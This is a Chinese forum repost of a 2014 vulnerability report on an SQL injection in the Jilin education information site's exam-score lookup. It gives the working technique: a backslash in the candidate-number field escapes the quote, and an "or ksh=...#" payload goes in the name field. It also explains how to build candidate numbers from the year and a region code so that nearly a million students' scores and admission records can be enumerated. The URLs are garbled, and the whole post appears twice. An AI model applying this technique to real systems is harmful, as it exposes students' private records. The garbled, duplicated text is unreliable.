-
-
吉林教育信息网严重SQL注入可查4年近百万高考成绩录取信息
-
发表于: 2014-8-14 10:39
-
新闻链接:fd1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2S2j5$3E0V1K9h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6%4j5i4m8Q4x3V1k6Q4x3@1k6A6k6q4)9K6c8o6p5J5y4U0V1I4
新闻时间:2014-08-13
新闻正文:
网址如下:
c95K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4!0q4z5q4)9^5x3q4)9^5x3#2!0q4y4#2)9&6y4q4)9&6c8W2!0q4y4g2)9^5c8W2!0n7y4#2)9J5y4Y4S2E0i4K6y4p5i4@1f1#2i4@1p5%4i4K6V1K6i4@1f1#2i4K6V1H3i4K6S2p5
如果直接输入单引号会提示“输入非法注入内容”,看来网站还是加了简单的过滤的
4eaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4#2)9J5y4Y4S2E0i4K6y4p5
但是他们忽略了转义字符“”
---------------------------↑↑(乌云会把单个反斜线转义成两个,以下所有反斜线都是单个的,自己去掉一下吧)
假设查询成绩的SQL语句是这样
SELECT * FROM grade WHERE ksh='考号' AND xm='姓名';
如果在考号里面加转义就变成了这样:
SELECT * FROM grade WHERE ksh='' AND xm='姓名';
这样ksh之后到xm之前一大坨就可以忽略,在“姓名”里面就可以任意构造SQL语句
SELECT * FROM grade WHERE ksh='' AND xm=' or ksh=14220821150199#';
别忘了在最后加注释#
最后实际执行的SQL语句是这样的
SELECT * FROM grade WHERE ksh='xxxxxxxxx' or ksh=14220821150199;
这样只需要考号不需要知道其对应姓名就可以查到成绩了。
构造以下exp:
69fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5@1x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
成绩已经出来了
14、13、12、11年的都是一样的
627K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5@1x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
816K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3#2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5K6x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
23aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3W2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5J5x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
9f2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3g2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5I4x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
接下来的问题是考号从哪里来?
随便看一个考号,12220822150199
可以这样分割 12|220822|15|0199
12是指2012年,13则对应2013年,其它同理
220822是身份证前六位,网上可以查得到
有了成绩里面已经包含了考生号和姓名,直接提交就可以查到录取信息了
b4aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6D9N6i4q4#2i4K6g2X3x3U0l9I4x3#2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9r3u0Q4x3@1c8Q4c8e0S2Q4z5o6m8Q4z5o6y4Q4c8e0g2Q4z5p5k6Q4b7U0N6Q4x3U0k6^5L8h3u0Q4x3@1c8Q4c8e0g2Q4b7e0N6Q4z5e0y4Q4c8e0g2Q4z5e0m8Q4z5p5b7`.
新闻时间:2014-08-13
新闻正文:
网址如下:
c95K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4!0q4z5q4)9^5x3q4)9^5x3#2!0q4y4#2)9&6y4q4)9&6c8W2!0q4y4g2)9^5c8W2!0n7y4#2)9J5y4Y4S2E0i4K6y4p5i4@1f1#2i4@1p5%4i4K6V1K6i4@1f1#2i4K6V1H3i4K6S2p5
如果直接输入单引号会提示“输入非法注入内容”,看来网站还是加了简单的过滤的
4eaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4#2)9J5y4Y4S2E0i4K6y4p5
但是他们忽略了转义字符“”
---------------------------↑↑(乌云会把单个反斜线转义成两个,以下所有反斜线都是单个的,自己去掉一下吧)
假设查询成绩的SQL语句是这样
SELECT * FROM grade WHERE ksh='考号' AND xm='姓名';
如果在考号里面加转义就变成了这样:
SELECT * FROM grade WHERE ksh='' AND xm='姓名';
这样ksh之后到xm之前一大坨就可以忽略,在“姓名”里面就可以任意构造SQL语句
SELECT * FROM grade WHERE ksh='' AND xm=' or ksh=14220821150199#';
别忘了在最后加注释#
最后实际执行的SQL语句是这样的
SELECT * FROM grade WHERE ksh='xxxxxxxxx' or ksh=14220821150199;
这样只需要考号不需要知道其对应姓名就可以查到成绩了。
构造以下exp:
69fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5@1x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
成绩已经出来了
14、13、12、11年的都是一样的
627K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4y4q4)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5@1x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
816K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3#2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5K6x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
23aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3W2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5J5x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
9f2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6U0K9r3g2F1k6$3A6A6i4K6g2X3x3U0l9I4x3g2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9q4)9K6c8q4)9J5y4Y4S2E0i4K6y4p5L8%4u0Q4x3U0f1J5x3r3E0K6K9q4)9K6c8o6p5I4x3U0t1H3z5o6t1I4x3e0f1H3x3e0V1&6i4K6t1#2x3U0x3`.
接下来的问题是考号从哪里来?
随便看一个考号,12220822150199
可以这样分割 12|220822|15|0199
12是指2012年,13则对应2013年,其它同理
220822是身份证前六位,网上可以查得到
有了成绩里面已经包含了考生号和姓名,直接提交就可以查到录取信息了
b4aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6D9k6h3c8#2i4K6u0W2k6$3!0$3i4K6u0W2j5$3&6Q4x3V1k6D9N6i4q4#2i4K6g2X3x3U0l9I4x3#2)9J5k6i4m8Z5M7q4)9K6c8X3E0K6K9r3u0Q4x3@1c8Q4c8e0S2Q4z5o6m8Q4z5o6y4Q4c8e0g2Q4z5p5k6Q4b7U0N6Q4x3U0k6^5L8h3u0Q4x3@1c8Q4c8e0g2Q4b7e0N6Q4z5e0y4Q4c8e0g2Q4z5e0m8Q4z5p5b7`.
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
